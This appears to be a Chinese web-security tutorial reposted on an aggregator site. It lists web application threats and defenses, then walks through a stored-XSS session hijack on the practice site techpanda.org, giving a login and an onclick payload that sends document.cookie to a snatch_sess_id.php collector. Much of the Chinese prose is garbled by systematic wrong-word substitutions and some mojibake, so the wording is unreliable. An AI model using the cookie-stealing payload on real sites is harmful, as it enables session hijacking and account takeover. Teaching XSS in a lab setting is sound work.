副问题[/!--empirenews.page--]
提到收集进攻起首我们看看两个题目。什么是收集应用措施?什么是收集威胁?
Web应用措施(aka网站)是基于客户端 - 处事器模子的应用措施。处事器提供数据库会见和营业逻辑。它托管在Web处事器上。客户端应用措施在客户端Web赏识器上运行。Web应用措施凡是用Java,C#和VB.Net,PHP,ColdFusion标志说话等说话编写.Web应用措施中行使的数据库引擎包罗MySQL,MS SQL Server,PostgreSQL,SQLite等。
大大都Web应用措施都托管在可通过Internet会见的民众处事器上。这使得它们易于会见,因此轻易受到进攻。以下是常见的Web应用措施威胁。
- SQL注入 - 此威胁的方针也许是绕过登录算法,粉碎数据等。人话:走后门
- 拒绝处事进攻 - 此威胁的方针也许是拒绝正当用户会见资源。人话:堵门
- 跨站点剧本XSS - 此威胁的方针大噶?觫入可在客户端赏识器上执行的代码。
- Cookie /会话中毒 - 此威胁的方针是通过进攻者修改Cookie /会话数据以获取未经授权的会见权限。
- 表格改动 - 此威胁的方针是修改表单数据,譬喻电子商务应用措施中的价值,以便进攻者可以以较低的价值得到物品。
- 代码注入 - 此威胁的方针是注入可在处事器上执行的PHP,Python等代码。代码可以安装后门,泄漏敏感信息等。
- 粉碎 - 此威胁的方针是修改网站上表现的页面,并将全部页面哀求重定向到包括进攻者动静的单个页面。
接下来我们该怎样掩护您的网站免受黑客进攻?
组织可以回收以下计策来掩护本身免受Web处事器进攻。
- SQL注入 - 在将用户参数提交到数据库举办处理赏罚之前整理和验证用户参数有助于低落通过SQL注入进攻的也许性。MS SQL Server,MySQL等数据库引擎支持参数和预处理赏罚语句。它们比传统的SQL语句更安详
- 拒绝处事进攻 -假如进攻是简朴的DoS,则可以行使防火墙从可疑IP地点中删除流量。正确设置收集和入侵检测体系尚有助于低落DoS进攻乐成的也许性。
- 跨站点剧本 -验证和整理标头,通过URL转达的参数,表单参数和潜匿值可以辅佐镌汰XSS进攻。
- Cookie /会话中毒 - 可以通过加密Cookie的内容,在一段时刻后将Cookie超时,将Cookie与用于建设Cookie的客户端IP地点相干联来防备这种环境。
- 表单回火 -这可以通过在处理赏罚之前验证和验证用户输入来防备。
- 代码注入 -可以通过将全部参数视为数据而不是可执行代码来防备这种环境。可以行使整理和验证来实现此目标。
- 粉碎 -一个好的Web应用措施开拓安详计接应该确保它密封常用的裂痕来会见Web处事器。在开拓Web应用措施时,这可所以操纵体系,Web处事器软件和最佳安详确践的正确设置。
最后我们来破解网站
我们将挟制位于www.techpanda.org的Web应用措施的用户会话。我们将行使跨站点脚原来读取cookie会话ID,然后行使它来模仿正当的用户会话。
假设是进攻者可以会见Web应用措施,,而且他想挟制行使沟通应用措施的其他用户的会话。假设进攻者的会见帐户是有限的,进攻的方针也许是获取对Web应用措施的打点员会见权限。
入门
- 打开http://www.techpanda.org/
- 出于实践目标,凶猛提议行使SQL注入获取会见权限。
- 登录电子邮件是admin@google.com,暗码是Password2010
- 假如您已乐成登录,那么您将得到以下仪表板
- 单击“添加新接洽人”
- 输入以下作为名字
- <a href=# onclick="document.location='http://techpanda.org/snatch_sess_id.php?c='+escape(document.cookie);">小莫</a>
这里,上面的代码行使JavaScript。它添加了一个带onclick变乱的超链接。当毫无戒心的用户单击该链接时,该变乱将检索PHP cookie会话ID并将其与URL中的会话ID一路发送到snatch_sess_id.php页面
输入别的具体信息,如下所示
- 因为跨站点剧本代码存储在数据库中,因此每次具有会见权限的用户登录时城市加载它
- 假设打点员登录并点击表现为Dark的超链接
- 他/她将得到URL中表现会话ID的窗口留意:剧本也许会将值发送到存储PHPSESSID的某个长途处事器,然后用户重定向回网站,就仿佛什么都没产生一样。
留意:您得到的值也许与本教程中的值差异,但观念是沟通的
行使Firefox和Tamper Data插件举办会话模仿
(编辑:河北网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|